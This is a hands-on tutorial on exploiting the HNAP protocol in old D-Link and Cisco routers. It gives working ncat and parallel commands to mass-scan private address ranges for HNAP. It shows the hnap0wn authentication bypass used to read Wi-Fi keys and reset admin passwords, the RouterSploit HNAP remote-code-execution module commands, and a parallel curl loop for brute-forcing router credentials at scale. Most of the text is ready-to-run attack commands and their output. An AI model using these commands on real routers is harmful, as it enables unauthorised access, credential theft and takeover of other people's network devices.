What is HNAP, how to find and exploit routers with HNAP

Among the Router Scan modules, you can see “Use HNAP 1.0”.

Among the scan results, on the very right side of the table, in the Comments column, you can find “HNAP bypass auth”.

That is, this protocol is used to bypass authentication. In this article, we will learn what HNAP is for, how to check if its router supports it, how to scan networks for devices with HNAP, how to exploit and brute force credentials using HNAP.

What is HNAP

Home Network Administration Protocol (HNAP) is a proprietary network protocol invented by Pure Networks, Inc. and acquired by Cisco Systems, which allows you to identify, configure and manage network devices. HNAP is based on SOAP.

This protocol appeared in 2007 and can be seen as a direct competitor to UPnP. Notable users of this protocol were Cisco and D-Link. However, both stopped using this protocol in 2012 and 2016, respectively. That is, yes, new devices no longer support this protocol, but the old routers are still there.

Especially noteworthy is that this feature is often hidden from the admin panel, making it impossible to disable it. If your router still supports HNAP, this probably means your router needs to be replaced.

Beginning in January 2010, vulnerabilities were discovered in several D-Link network devices in which HNAP authentication could be bypassed.

How to find out if the router supports HNAP

As already mentioned, HNAP support can be found mainly in older Cisco and D-Link devices.

To check for sure, run a command like:

echo "GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n" | ncat ROUTER-IP 80

In it, instead of the ROUTER-IP, insert the IP-address, for example:

echo "GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n" | ncat 172.23.4.130 80

If the output data contains the string ‘<?xml version="1.0" encoding="utf-8"?><soap:…………….’, then this router supports HNAP.

How to scan a network looking for HNAP

I have not found any scanners that can search for HNAP. Except for Router Scan, which tries to exploit this protocol if other means have failed.

But since we know the HNAP verification command, paired with Parallel, we can make our own “tool” for scanning large networks to find HNAPs.

So, I want to scan network 172.16.0.0/12, this is the IP range 172.16.0.0-172.31.255.255. In this case, I want to scan two ports at once – port 80 and 8080. Then the command is as follows:

parallel -j250 'if [[ "`echo "GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n" | timeout 3 ncat 172.{3}.{1}.{2} 80 2>/dev/null | grep -E -o xml`" ]]; then echo 172.{3}.{1}.{2}; fi; if [[ "`echo "GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n" | timeout 3 ncat 172.{3}.{1}.{2} 8080 2>/dev/null | grep -E -o xml`" ]]; then echo 172.{3}.{1}.{2}:8080; fi' ::: {1..255} ::: {1..255} ::: {16..31}

If you modify it to fit your needs, please note that the IP address in the command is indicated 4 times – change it in all places.

The command is used as the main payload:

echo "GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n" | timeout 3 ncat 172.{3}.{1}.{2} 80 2>/dev/null | grep -E -o xml

It is based on the command we already know, but added a timeout of 3 seconds. Also, grep searches the output for the string “xml”. If it is found, then the if() condition is met and the IP address is displayed.

This design is duplicated, but in the second case, the port is replaced with 8080.

I hope you can guess the meaning “172.{3}.{1}.{2}» и « ::: {1..255} ::: {1..255} ::: {16..31}” string, if not, please consider learning the Parallel program – it is great!

As you can see, the scan is still in progress, but I already got the results:

How to exploit HNAP

There are a couple of tools available to exploit the HNAP.

Hnap0wn

The Hnap0wn tool was introduced 10 years ago. This is an exploit to bypass administrative login for HNAP-enabled D-Link routers.

Now it can be downloaded from the following links (the versions are not identical! In this tutorial I use the first one):

• https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11101.tar.gz
• https://web.archive.org/web/20140727021850/http://www.sourcesec.com/Lab/hnap0wn.tar.gz

Download and unpack from the command line:

mkdir hnap0wn
cd hnap0wn
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11101.tar.gz
tar xvzf 11101.tar.gz

This tool allows you to check if there is a vulnerability that allows you to perform actions without specifying a password, as well as view information from a device both with a password and without a password if the device is vulnerable.

In the xml folder that comes with this program, there are several .xml files to do typical things.

Example command:

./hnap0wn 172.24.98.25:8080 xml/GetWLanSecurity.xml

There is a result, but I think you cannot read XML files on the fly without formatting. Therefore, we will be using xmllint utility (it is contained in libxml2-utils package on Debian or libxml2 package on Arch Linux).

To have Hnap0wn output valid XML, open the hnap0wn file:

gedit ./hnap0wn

And find and delete there on the 49th line:

echo ""

Then we run along with xmllint:

./hnap0wn 172.24.98.25:8080 xml/GetWLanSecurity.xml | xmllint --format -

Now it's clearer, pay attention to the line:

<Key>789654123</Key>

That is, the password for Wi-Fi is 789654123.

With a command like this:

./hnap0wn 172.24.98.25:8080 xml/GetWLanSettings24.xml | xmllint --format -

We got lines:

<MacAddress>84:c9:b2:5b:59:40</MacAddress>
<SSID>Pozitiv</SSID>

As you might guess, these are BSSID (MAC address) and ESSID (access point name).

All available actions:

• AddPortMapping.xml
• DeletePortMapping.xml
• GetConnectedDevices.xml
• GetDeviceSettings.xml
• GetMACFilters2.xml
• GetNetworkStats.xml
• GetPortMappings.xml
• GetRouterLanSettings.xml
• GetWanSettings.xml
• GetWanStatus.xml
• GetWLanRadioSettings.xml
• GetWLanRadios.xml
• GetWLanSecurity.xml
• GetWLanSettings24.xml
• IsDeviceReady.xml
• Reboot.xml
• RenewWanConnection.xml
• SetDeviceSettings.xml
• SetLanSettings.xml
• SetMACFilters2.xml
• SetRouterLanSettings.xml
• SetWanSettings.xml
• SetWLanSecurity.xml
• SetWLanSettings.xml

If you see only blank lines in the output, it means an authentication error (wrong username and/or password).

If you know the username and password, then use a command like this:

./hnap0wn USER:PASSWORD@192.168.0.1 xml/SetDeviceSettings.xml

For example (if the password is empty, then you still need to preserve a colon, you can skip port 80):

./hnap0wn admin:@172.23.4.130:80 xml/GetConnectedDevices.xml | xmllint --format -

You can change the password with SetDeviceSettings.xml:

./hnap0wn admin:@172.23.4.130:80 xml/SetDeviceSettings.xml | xmllint --format -

Moreover, by default, the password is set to empty. You can specify any password, to do this, open the SetDeviceSettings.xml file and enter the password there between the tags:

<AdminPassword>PASSWORD HERE</AdminPassword>

The Best result is to manage to bypass authentication and reset a router password. Sometimes this does not work, but even without knowing the password, you can view the settings of the routers, including the Wi-Fi password.

RouterSploit

RouterSploit has a “D-Link Multi HNAP RCE” module that exploits the remote HNAP code execution vulnerability on multiple D-Link devices, which allows commands to be executed on the device.

The following devices are vulnerable

• D-Link DIR-645
• D-Link AP-1522 revB
• D-Link DAP-1650 revB
• D-Link DIR-880L
• D-Link DIR-865L
• D-Link DIR-860L revA
• D-Link DIR-860L revB
• D-Link DIR-815 revB
• D-Link DIR-300 revB
• D-Link DIR-600 revB
• D-Link DIR-645
• D-Link TEW-751DR
• D-Link TEW-733GR

The RCE vulnerability is not the same authentication bypass vulnerability that we discussed above. That is, routers vulnerable to HNAP bypass auth were not vulnerable to RCE.

I could not find routers vulnerable to RCE, but to use the module, you need to run the following commands:

Launch RouterSploit:

./rsf.py

In the RouterSploit console:

use exploits/routers/dlink/multi_hnap_rce
show options
set target 172.23.4.130
set port 80
run

In case of successful exploitation, a shell will be opened, but remote command injection will be blind – this is the most difficult version, without outputting information. Therefore, see the article “How to exploit blind command injection vulnerability”.

How to brute force a router password using HNAP

The password for entering the administrative panel of the router is the same for performing actions with HNAP. Therefore, if the web page of the router is protected by captcha, then you can use HNAP to bypass the captcha.

I haven't found HNAP brute force tools, but that's not a problem.

If you run a command like:

curl -v --insecure --header "SOAPAction: \"http://purenetworks.com/HNAP1/GetWanStatus\"" -d "$(cat GetWanStatus.xml)" http://USER:PASSWORD@HOST:PORT/HNAP1/

Then, depending on whether the credentials are correct or not, a response code will be received:

< HTTP/1.1 200 OK

Or in case of failed authentication:

< HTTP/1.1 401 Unauthorized

To execute this command, you need a GetWanStatus.xml file with the following content:

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
	<soap:Body>
		<GetWanStatus xmlns="http://purenetworks.com/HNAP1/">
		</GetWanStatus>
	</soap:Body>
</soap:Envelope>

This file is taken from the Hnap0wn program. In fact, we need to send any correct request, just to get a normal response code.

An example of executing two commands:

curl -v --insecure --header "SOAPAction: \"http://purenetworks.com/HNAP1/GetWanStatus\"" -d "$(cat GetWanStatus.xml)" http://admin:@172.23.4.130:80/HNAP1/
curl -v --insecure --header "SOAPAction: \"http://purenetworks.com/HNAP1/GetWanStatus\"" -d "$(cat GetWanStatus.xml)" http://wrong-user-name:@172.23.4.130:80/HNAP1/

Now we compose the parallel command. Files used:

• users.txt is a list of usernames (all files in the format – one record per line)
• pass.txt is a list of passwords
• hosts.txt is a list of hosts (if the port is different from 80, then it must be specified with a colon)

Parallel command:

parallel -j250 'if [[ "`curl -v --insecure --header "SOAPAction: \"http://purenetworks.com/HNAP1/GetWanStatus\"" -d "$(cat GetWanStatus.xml)" http://{1}:{2}@{3}/HNAP1/ 2>&1 | grep \"200 OK\"`" ]]; then echo {1}:{2}@{3}; fi;' :::: users.txt :::: pass.txt :::: hosts.txt

If a username and password are found, they will be displayed along with the host address.

These are the results of a successful password cracking:

Conclusion

Of course, the HNAP protocol is losing its relevance due to the fact that network equipment manufacturers have abandoned its use. Nevertheless, even in 2020, new vulnerabilities continue to be found, for example: ZDI-20-267 (CVE-2020-8863) and ZDI-20-268 (CVE-2020-8864), which affect D-Link DIR-882 routers, DIR-878 and DIR-867 (source).

The protocol itself is a good case study for writing your own code to automate attacks, since the protocol is relatively simple and there are few ready-made tools.